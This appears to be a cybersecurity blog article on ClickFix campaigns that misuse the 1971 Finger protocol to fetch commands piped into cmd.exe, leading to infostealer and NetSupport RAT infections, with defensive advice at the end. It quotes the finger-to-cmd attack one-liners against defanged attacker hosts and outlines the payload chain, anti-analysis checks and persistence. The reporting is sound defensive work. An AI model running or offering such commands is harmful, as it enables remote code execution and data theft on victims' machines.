ClickFix Gets Creative: Abusing a 1971 Protocol to Deliver Malware

Brendan Smith
Brendan Smith - Cybersecurity Analyst
7 Min Read
ClickFix Resurrects
ClickFix Resurrects

ClickFix is so widespread these days that you can find the most exotic things in it. In one campaign, researchers spotted an original malware delivery method: they’re using the Finger protocol. You know, the one written in 1971. That’s right—attackers are dusting off ancient tech to deliver modern threats, and it’s working.

Finger is a simple, ancient protocol for getting information about a user on a remote computer. Back in the day, people used it to look up basic user info—login names, home directories, phone numbers, when they last logged in. That kind of thing. It was added to Windows too, though nobody really uses it anymore. It’s been collecting digital dust since the 80s.

When you run the finger command, it connects to TCP port 79 and retrieves information from a remote finger server. In its original form, it returns basic user details. But in the context of ClickFix? It retrieves malicious commands instead.

How ClickFix Abuses Finger

Here’s how this works. A user falls for a ClickFix page—maybe a fake CAPTCHA verification or a document viewer error. They’re told to press Win+R and run a command. The command looks something like this:

cmd /c start "" /min cmd /c "finger [email protected][.]org | cmd"

What happens next is clever. The finger command connects to the attacker’s server and retrieves commands, which are then piped directly through cmd.exe and executed. No PowerShell needed. No suspicious downloads. Just a simple protocol from 1971 doing the attacker’s bidding.

  • Created a random-named path
  • Copied curl.exe to a random filename
  • Used the renamed curl to download a zip archive disguised as a PDF
  • Extracted a Python malware package
  • Executed it using pythonw.exe

All while displaying a fake “Verify you are human” prompt to keep the victim thinking everything’s fine. The final payload? Likely an infostealer, based on related batch files researchers found.

Advanced Variants

But wait, it gets better. Some variants are more sophisticated. One campaign uses “`finger [email protected] | cmd`” to retrieve commands that first check for dozens of malware analysis tools. If it finds any of these, it exits immediately:

  • Filemon, Regmon, Procexp, Procmon
  • Tcpview, Vmmap, Portmon
  • Wireshark, Fiddler
  • IDA, x64dbg, OllyDbg, ImmunityDebugger
  • ProcessHacker, ProcessLasso
  • And more

If no analysis tools are detected, it proceeds to download a zip archive disguised as a PDF. But instead of a Python package, this one extracts NetSupport Manager RAT—a full remote access trojan. Then it configures a scheduled task to launch the malware when the user logs in. Persistent access, delivered via a protocol from 1971. You’ve got to respect the creativity, even if you hate the intent.

Why This Works: The LOLBIN Advantage

Finger is a legitimate Windows command. It’s a LOLBIN (Living Off The Land Binary)—a legitimate tool that attackers abuse for malicious purposes. Security tools don’t flag it because it’s supposed to be there. It’s not malware. It’s just a command doing what it was designed to do, except the attacker controls what information it retrieves.

This isn’t even the first time finger has been abused. Researchers warned about this back in 2020. But now it’s part of the ClickFix toolkit, and it’s working because users are falling for the social engineering.

A Real Victim’s Story

One Reddit user shared their experience after falling for this exact attack. They were in a rush, saw a “verify you are human” prompt, and ran the command. After realizing what happened, they panicked and asked for help. McAfee+ showed no threats, which made them even more worried.

This is the reality of ClickFix attacks. Users are in a hurry. They see something that looks legitimate. They follow instructions. And by the time they realize something’s wrong, the damage might already be done. The finger command executes, retrieves the malicious script, and the payload is delivered—all while the user thinks they’re just verifying they’re human.

This is what ClickFix has become. It’s not just one attack method—it’s an entire ecosystem of social engineering techniques. Attackers are getting creative, using everything from modern AI-powered pages to protocols from 1971. They’re adapting faster than defenses can keep up.

The fact that a 54-year-old protocol is being used in modern attacks tells you something about the state of cybersecurity. Attackers will use whatever works. If it’s old, obscure, and still functional, they’ll abuse it. And users will fall for it because they’re human, they’re in a hurry, and they trust what looks legitimate.

So protect your users. Block port 79. Monitor for finger.exe. Deploy layered defenses. And remember: if you couldn’t teach them not to stick their fingers in electrical outlets, you’re definitely not going to teach them not to run commands from suspicious websites. The best you can do is catch the attacks when they happen.

ClickFix is so widespread that attackers are using the most exotic delivery methods. The Finger protocol from 1971 is just the latest example. It’s a simple, legitimate command that retrieves information—except now attackers control what information it retrieves, and that information is malicious commands.

Users will fall for these attacks. They’re human. They’re in a hurry. They see something that looks legitimate and they follow instructions. The best defense isn’t trying to teach them not to make mistakes—it’s building security controls that assume they will and catching attacks before they succeed.

Block port 79. Monitor for finger.exe. Deploy EDR. And remember: you’re not just protecting systems, you’re protecting people who will inevitably make mistakes. Because if you couldn’t teach them not to stick their fingers in electrical outlets, you’re definitely not going to teach them not to run commands from fake CAPTCHA pages.

For more on ClickFix attacks, check our analysis of ClickFix evolution in 2025 and how attackers are using Lumma Stealer in these campaigns.

ClickFix Gets Creative: Abusing a 1971 Protocol to Deliver Malware

Share This Article
Cybersecurity Analyst
Follow:
Brendan Smith has spent over 15 years knee-deep in cybersecurity, chasing down malware from the gritty reverse-engineering of old-school trojans all the way to wrangling full-blown incident responses for small-to-medium businesses that couldn’t afford a full-blown breach. Over at Gridinsoft, he’s the guy piecing together those double-checked guides on nasty stuff like AsyncRAT ransomware—take last year, for instance, when his breakdowns caught more than 200 sneaky variants right in live scans, knocking user cleanup jobs down by a solid 40% and saving folks hours of headache.
Leave a Comment

AI Assistant

Hello! 👋 How can I help you today?